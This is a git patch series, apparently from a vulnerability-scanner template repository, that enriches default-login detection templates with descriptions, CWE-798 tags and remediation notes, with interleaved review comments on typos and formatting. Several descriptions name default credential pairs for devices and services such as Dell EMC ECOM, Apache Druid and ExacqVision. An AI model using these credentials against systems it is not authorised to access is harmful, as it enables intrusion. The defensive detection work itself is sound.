From 4df523df0e509c3d4bdbec80e7ebef1af0500516 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 11:38:05 -0500
Subject: [PATCH 001/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index c7d78156d9..902bf7d0af 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -4,9 +4,12 @@ info:
name: Dell EMC ECOM Default Login
author: Techryptic (@Tech)
severity: high
- description: Default Login of admin:#1Password on Dell EMC ECOM application.
+ description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
+ remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
+ classification:
+ cwe-id: 798
requests:
- raw:
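Review bot: The new `cwe-id: 798` under `classification:` is an unquoted plain scalar, so a YAML loader types it as the integer 798 rather than as the CWE identifier string; the rest of this page uses the string form, e.g. `cwe-id: CWE-20` in gitlab-rce.yaml and the later `cwe-id: CWE-798` edits in this series. Write it as `cwe-id: CWE-798` here; patches 002, 003, 004, 005, 006 and 011 add the same bare integer. Separately, the new description wraps the credential pair in stray double quotes, `"(admin:#1Password)"`; the parentheses already set it off, so the quotes can go. The `info:` mapping this hunk edits starts before the hunk.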
@@ -35,4 +38,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/03
From e63283a88dcd3018b5b585d46eae8b38c65e5913 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:18:20 -0500
Subject: [PATCH 002/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index 78d252b867..f36476a73d 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -1,10 +1,13 @@
id: druid-default-login
info:
- name: Druid Default Login
+ name: Apache Druid Default Login
author: pikpikcu
severity: high
+ description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -36,4 +39,6 @@ requests:
- type: regex
regex:
- - "^success$"
\ No newline at end of file
+ - "^success$"
+
+# Enhanced by mp on 2022/03/03
From 6ccf56ab66eb4f59b8aaef3c7567cdff303e3cf1 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:36:18 -0500
Subject: [PATCH 003/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 941c2c30d0..fdae676c44 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -1,9 +1,15 @@
id: dvwa-default-login
+
info:
name: DVWA Default Login
author: pdteam
severity: critical
+ description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
tags: dvwa,default-login
+ reference:
+ - https://opensourcelibs.com/lib/dvwa
+ classification:
+ cwe-id: 798
requests:
- raw:
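Review bot: The new DVWA description never states what the template actually reports — every other description added in this series opens with the detected condition — and its second sentence ("part of a security testing scenario") reads as a reason to disregard the finding while the template keeps `severity: critical`. Lead with the finding and keep the context as the explanation: `description: DVWA default login credentials were discovered. Damn Vulnerable Web App (DVWA) is a deliberately vulnerable test application for security professionals; an instance reachable with its default credentials indicates a test deployment exposed to the scanned network.` The `info:` block continues outside this hunk.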
@@ -50,3 +56,5 @@ requests:
- type: word
words:
- "You have logged in as 'admin'"
+
+# Enhanced by mp on 2022/03/03
From a39e3081ad637bf7ff06fb36ed6167f0d2460500 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 12:45:16 -0500
Subject: [PATCH 004/259] Enhancement:
default-logins/exacqvision/exacqvision-default-login.yaml by mp
---
default-logins/exacqvision/exacqvision-default-login.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index e04d3a0f7f..49d90c9775 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -4,8 +4,11 @@ info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
+ description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -41,3 +44,5 @@ requests:
words:
- '"auth":'
- '"success": true'
+
+# Enhanced by mp on 2022/03/03
From df44ab1b80769c467eaeaef31c4aa35c71a998ee Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:26:51 -0500
Subject: [PATCH 005/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 7 +++++++
1 file changed, 7 insertions(+)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 9cb112ad91..7b0077a878 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -4,7 +4,12 @@ info:
name: Flir Default Login
author: pikpikcu
severity: medium
+ description: Flir default login credentials (admin/admin) were discovered.
+ reference:
+ - https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
+ classificaiton:
+ cwe-id: 798
requests:
- raw:
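Review bot: The classification key added just above `cwe-id` is misspelled `classificaiton:`, so the template gains an unknown `info` key and the CWE mapping is never attached to the finding (as far as I recall the Nuclei template loader rejects unknown fields, which would turn this into a load error rather than a silent drop — worth confirming). Rename it to `classification:`. Patch 010 introduces the same misspelling in gitlab-weak-login.yaml, and patches 012, 026 and 028 edit the `cwe-id` value beneath the misspelled key without correcting it. The `info:` block starts before this hunk.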
@@ -41,3 +46,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 7174aed1915d1817c2fa7010a4c57e1df6b6bada Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:33:11 -0500
Subject: [PATCH 006/259] Enhancement:
default-logins/frps/frp-default-login.yaml by mp
---
default-logins/frps/frp-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 2dc240d633..280c198e62 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -1,11 +1,14 @@
id: frp-default-login
info:
- name: Frp Default Login
+ name: FRP Default Login
author: pikpikcu
severity: high
+ description: FRP default login credentials were discovered.
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
+ classification:
+ cwe-id: 798
requests:
- raw:
@@ -33,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 367f1a7bc310adf7ff16fe605eba4f9677cc04d6 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:52:06 -0500
Subject: [PATCH 007/259] Enhancement:
default-logins/apache/tomcat-default-login.yaml by mp
---
default-logins/apache/tomcat-default-login.yaml | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index a9638ecc78..6269bc9a8b 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -1,8 +1,11 @@
id: tomcat-default-login
info:
- name: Tomcat Manager Default Login
+ name: ApahceTomcat Manager Default Login
author: pdteam
+ description: Apache Tomcat Manager default login credentials were discovered.
severity: high
+ reference:
+ - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
tags: tomcat,apache,default-login
requests:
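Review bot: The new name at the top of the hunk, `name: ApahceTomcat Manager Default Login`, misspells the vendor and drops the space; it should read `name: Apache Tomcat Manager Default Login`. Patch 018 later edits the same `info:` block and leaves this line untouched. This is also the only default-login template in the batch that does not receive a CWE mapping; for consistency with the others, add `classification:` with `  cwe-id: CWE-798` after the `reference:` list. The `info:` block continues outside this hunk.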
@@ -64,3 +67,5 @@ requests:
- type: word
words:
- Apache Tomcat
+
+# Enhanced by mp on 2022/03/03
From 461497b437b7161590ff799ac8fa0cfb3a8d014f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:55:38 -0500
Subject: [PATCH 008/259] Enhancement:
default-logins/azkaban/azkaban-default-login.yaml by mp
---
default-logins/azkaban/azkaban-default-login.yaml | 6 ++----
1 file changed, 2 insertions(+), 4 deletions(-)
diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml
index 1970b6e737..1d8072f875 100644
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
- cwe-id: 255
+ cwe-id: 798
requests:
- raw:
@@ -50,6 +50,4 @@ requests:
kval:
- azkaban.browser.session.id
-# Enhanced by mp on 2022/03/02
-
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 591d4e48a87c9a57e194ba7d96a568e99bda3980 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 14:58:08 -0500
Subject: [PATCH 009/259] Enhancement:
default-logins/cobbler/cobbler-default-login.yaml by mp
---
default-logins/cobbler/cobbler-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
index 65f9d50d26..26cf96c8c7 100644
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -3,7 +3,7 @@ id: cobbler-default-login
info:
name: Cobbler Default Login
author: c-sh0
- description: Cobbler default login credentials were discovered. When in /etc/cobbler/modules.conf in the [authentication] part of the "testing" module, the credential “testing:testing” is used to authenticate users.
+ description: Cobbler default login credentials for the testing module (testing/testing) were discovered.
reference:
- https://seclists.org/oss-sec/2022/q1/146
- https://github.com/cobbler/cobbler/issues/2307
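Review bot: The rewritten description drops the one operational detail the old text carried — that the credential is active when the `testing` module is selected in the `[authentication]` section of `/etc/cobbler/modules.conf` — which is exactly what a responder needs to confirm and close the finding. Keep the shorter description, but carry that detail into a new `remediation: Switch the [authentication] module in /etc/cobbler/modules.conf away from "testing", which authenticates with the fixed credential testing/testing.` line, matching the `remediation:` field this series adds to emcecom-default-login.yaml. The `info:` block extends beyond this hunk.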
@@ -69,4 +69,4 @@ requests:
regex:
- "(.*[a-zA-Z0-9].+==)"
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From cced84520e7a8e69d8139b5564091aeedeb1bfcc Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:05:45 -0500
Subject: [PATCH 010/259] Enhancement:
default-logins/gitlab/gitlab-weak-login.yaml by mp
---
default-logins/gitlab/gitlab-weak-login.yaml | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index e76419e893..47eeafcaf1 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -1,15 +1,18 @@
id: gitlab-weak-login
info:
- name: Gitlab Weak Login
+ name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
+ description: Gitlab default login credentials were discovered.
tags: gitlab,default-login
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
metadata:
shodan-query: http.title:"GitLab"
+ classificaiton:
+ cwe-id: 798
requests:
- raw:
@@ -50,4 +53,6 @@ requests:
- '"access_token":'
- '"token_type":'
- '"refresh_token":'
- condition: and
\ No newline at end of file
+ condition: and
+
+# Enhanced by mp on 2022/03/03
From 80de314765961dbca4724d95f8cfa1889ef56572 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:36:15 -0500
Subject: [PATCH 011/259] Enhancement:
default-logins/glpi/glpi-default-login.yaml by mp
---
default-logins/glpi/glpi-default-login.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml
index c2ea4c26d7..1871b41841 100644
--- a/default-logins/glpi/glpi-default-login.yaml
+++ b/default-logins/glpi/glpi-default-login.yaml
@@ -7,7 +7,8 @@ info:
tags: glpi,default-login
description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
-
+ classification:
+ cwe-id: 798
requests:
- raw:
- |
@@ -65,3 +66,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/03
From 0f9b7c21994961c73332852e3554800ee94f9f95 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:37:05 -0500
Subject: [PATCH 012/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 7b0077a878..4a16184837 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
classificaiton:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
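Review bot: The corrected value `cwe-id: cwe-798` is lowercase, while the existing identifier on this page is written `cwe-id: CWE-20` (gitlab-rce.yaml) and the later edits in this series settle on `CWE-798`; use `cwe-id: CWE-798` directly so the identifier matches the canonical CWE form and does not need a second pass. Patches 013, 014, 015, 016 and 017 make the same lowercase change. Note also that in this file the parent key is still spelled `classificaiton:`, so the corrected value sits under an unrecognised key until that is fixed as well.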
From 9d8e6eb4670c990e1dfeea3451cf4a54af07b8b7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:37:36 -0500
Subject: [PATCH 013/259] Enhancement:
default-logins/exacqvision/exacqvision-default-login.yaml by mp
---
default-logins/exacqvision/exacqvision-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index 49d90c9775..fa13193ef8 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -8,7 +8,7 @@ info:
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From 680a70c6d78efd0106d8627e5a2f9eddf509dfa4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:38:03 -0500
Subject: [PATCH 014/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index fdae676c44..7e967df3d4 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://opensourcelibs.com/lib/dvwa
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From e1daf371929f4cb16b3594d16fb2670d4df9a9d4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:38:29 -0500
Subject: [PATCH 015/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index f36476a73d..afe3d891a4 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From a109daa435c337e0b4bec3812204a69fde8c1295 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:39:02 -0500
Subject: [PATCH 016/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 902bf7d0af..2c72107657 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
From b3b6ee59d305d9cbbc43e972a5c92444f7bf93d0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:39:31 -0500
Subject: [PATCH 017/259] Enhancement:
default-logins/dell/dell-idrac9-default-login.yaml by mp
---
default-logins/dell/dell-idrac9-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml
index 2954ca38b1..e4c6acd8ec 100644
--- a/default-logins/dell/dell-idrac9-default-login.yaml
+++ b/default-logins/dell/dell-idrac9-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
tags: dell,idrac,default-login
classification:
- cwe-id: 798
+ cwe-id: cwe-798
requests:
- raw:
@@ -39,4 +39,4 @@ requests:
words:
- '"authResult":0'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 957f02a47aa59725d6bace158263b364157e5f01 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:42:21 -0500
Subject: [PATCH 018/259] Enhancement:
default-logins/apache/tomcat-default-login.yaml by mp
---
default-logins/apache/tomcat-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index 6269bc9a8b..1f69e7a798 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -2,7 +2,7 @@ id: tomcat-default-login
info:
name: ApahceTomcat Manager Default Login
author: pdteam
- description: Apache Tomcat Manager default login credentials were discovered.
+ description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
severity: high
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
From 802e0e9b328cfdecffe29d53ced2c6e42f0f0432 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:43:16 -0500
Subject: [PATCH 019/259] Enhancement:
default-logins/azkaban/azkaban-default-login.yaml by mp
---
default-logins/azkaban/azkaban-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml
index 1d8072f875..828b52ef69 100644
--- a/default-logins/azkaban/azkaban-default-login.yaml
+++ b/default-logins/azkaban/azkaban-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
tags: default-login,azkaban
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From 4a56398ac36b15abb95e64ad031ade1ad52cfe5e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:03 -0500
Subject: [PATCH 020/259] Enhancement:
default-logins/chinaunicom/chinaunicom-default-login.yaml by mp
---
default-logins/chinaunicom/chinaunicom-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml
index bfd586c991..264ffd5f07 100644
--- a/default-logins/chinaunicom/chinaunicom-default-login.yaml
+++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Default login credentials were discovered for a China Unicom modem.
tags: chinaunicom,default-login
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
@@ -35,4 +35,4 @@ requests:
- "/menu.gch"
part: header
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From 03ce47eee05696082fa08e97419c39acb5c8b2c3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:33 -0500
Subject: [PATCH 021/259] Enhancement:
default-logins/cobbler/cobbler-default-login.yaml by mp
---
default-logins/cobbler/cobbler-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/cobbler/cobbler-default-login.yaml b/default-logins/cobbler/cobbler-default-login.yaml
index 26cf96c8c7..7a291fcf40 100644
--- a/default-logins/cobbler/cobbler-default-login.yaml
+++ b/default-logins/cobbler/cobbler-default-login.yaml
@@ -11,7 +11,7 @@ info:
severity: high
tags: cobbler,default-login,api
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 352f8ae75d68f4bf720a1e4543c1fe92d06f3518 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:44:56 -0500
Subject: [PATCH 022/259] Enhancement:
default-logins/dell/dell-idrac-default-login.yaml by mp
---
default-logins/dell/dell-idrac-default-login.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml
index 0ae492af80..b0f88ff1cd 100644
--- a/default-logins/dell/dell-idrac-default-login.yaml
+++ b/default-logins/dell/dell-idrac-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securityforeveryone.com/tools/dell-idrac6-7-8-default-login-scanner
tags: dell,idrac,default-login
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
@@ -41,4 +41,4 @@ requests:
words:
- '0'
-# Enhanced by mp on 2022/03/02
+# Enhanced by mp on 2022/03/03
From c41b77e6a7cc39a44d17ecf469df1eff1c75a016 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:45:13 -0500
Subject: [PATCH 023/259] Enhancement:
default-logins/dell/emcecom-default-login.yaml by mp
---
default-logins/dell/emcecom-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 2c72107657..702fcf9b62 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 77bcfd56f9007cc8a04fece4fcdf4f5316f56f5b Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:45:32 -0500
Subject: [PATCH 024/259] Enhancement:
default-logins/druid/druid-default-login.yaml by mp
---
default-logins/druid/druid-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml
index afe3d891a4..4dd778392e 100644
--- a/default-logins/druid/druid-default-login.yaml
+++ b/default-logins/druid/druid-default-login.yaml
@@ -7,7 +7,7 @@ info:
description: Apache Druid default login information (admin/admin) was discovered.
tags: druid,default-login
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From f6f0982b9ef02d17e59a6609a7a40c8f33b26c3c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:46:01 -0500
Subject: [PATCH 025/259] Enhancement:
default-logins/dvwa/dvwa-default-login.yaml by mp
---
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 7e967df3d4..4ade6498f5 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -9,7 +9,7 @@ info:
reference:
- https://opensourcelibs.com/lib/dvwa
classification:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 64c31b5dc99814de2b0fed64c0236d6f7c56dff4 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:46:18 -0500
Subject: [PATCH 026/259] Enhancement:
default-logins/flir/flir-default-login.yaml by mp
---
default-logins/flir/flir-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 4a16184837..74645c8686 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -9,7 +9,7 @@ info:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
classificaiton:
- cwe-id: cwe-798
+ cwe-id: CWE-798
requests:
- raw:
From 070a65f4b666639edcdf94fdd1e41bbe74e2c97f Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:48:03 -0500
Subject: [PATCH 027/259] Enhancement:
